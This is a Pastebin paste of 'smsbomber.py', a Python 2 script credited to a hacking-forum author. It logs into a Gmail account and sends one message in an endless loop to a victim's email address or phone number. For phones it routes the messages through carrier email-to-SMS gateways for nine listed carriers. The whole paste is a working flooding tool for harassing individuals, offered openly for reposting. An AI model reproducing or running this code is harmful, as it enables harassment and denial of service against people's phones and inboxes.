Advertisement
Guest User

Untitled

a guest
May 25th, 2014
519
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.45 KB | None | 0 0
  1. # Name: smsbomber.py
  2. # Coded by Syst3mCr4sh420 from VipHackForum.net
  3. # Released exclusively to VipHackForums.net
  4. # Feel free to repost, leave credit in tact.
  5.  
  6.  
  7. import smtplib as s
  8.  
  9. print"\n\r\n\rSyst3mCr4sh420's - Email and SMS Bomber \n\r"
  10. print"\n\r\n\rPlease login with your Gmail account \n\r"
  11.  
  12. username = raw_input("Gmail Username: ")
  13. password = raw_input("Gmail Password: ")
  14.  
  15. obj = s.SMTP("smtp.gmail.com:587")
  16. obj.starttls()
  17. obj.login(username, password)
  18. print"\n\r"
  19.  
  20. print """ What kind of bomb would you like to send?
  21.  
  22. 1. SMS
  23. 2. Email
  24.  
  25. """
  26. option = input()                   
  27. print("\n\r")
  28. if option == 1:    
  29.     carrier_attack = 0
  30.     print """ What is their carrier? Respond with the corresponding number
  31.         1. ~ Alltel
  32.         2. ~ AT&T
  33.         3. ~ Rogers
  34.         4. ~ Sprint
  35.         5. ~ T-Mobile
  36.         6. ~ Telus
  37.         7. ~ Verizon     
  38.         8. ~ Virgin Mobile
  39.         9. ~ Orange
  40.         \n\r
  41. """    
  42.     carrier = input()
  43.  
  44.     if carrier == 1:
  45.         carrier_attack = "@alltelmessage.com"
  46.     if carrier == 2:
  47.         carrier_attack = "@txt.att.net"
  48.     if carrier == 3:
  49.         carrier_attack = "@pcs.rogers.com"
  50.     if carrier == 4:
  51.         carrier_attack = "@messaging.sprintpcs.com"
  52.     if carrier == 5:
  53.         carrier_attack = "@tmomail.net"
  54.     if carrier == 6:
  55.         carrier_attack = "@msg.telus.com"
  56.     if carrier == 7:
  57.         carrier_attack = "@vtext.com"
  58.     if carrier == 8:
  59.         carrier_attack = "@vmobl.com"
  60.     if carrier == 9:
  61.         carrier_attack = "@sms.orange.pl"
  62.  
  63.     v_phone = raw_input("Phone Number: ") + str(carrier_attack)
  64.     message = raw_input("Message: ")
  65.     phone_message = ("From: %s\r\nTo: %s \r\n\r\n %s"
  66.        % (username, "" .join(v_phone), "" .join(message)))
  67.    
  68.     while 1:
  69.         obj.sendmail(username, v_phone, phone_message)
  70.         print "Message sent! Sending another.. Press Ctrl + C to stop."
  71.  
  72. if option == 2:    
  73.     v_email = raw_input("Email: ")
  74.     message = raw_input("Message: ")
  75.     email_message = (" \r\n\r\n From: %s\r\n To: %s\r\n\r\n  %s"
  76.        % (username, "" .join(v_email), "" .join(message)))
  77.    
  78.     while 1:
  79.         obj.sendmail(username, v_email, email_message)
  80.         print "Message sent! Sending another.. Press Ctrl + C to stop."
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement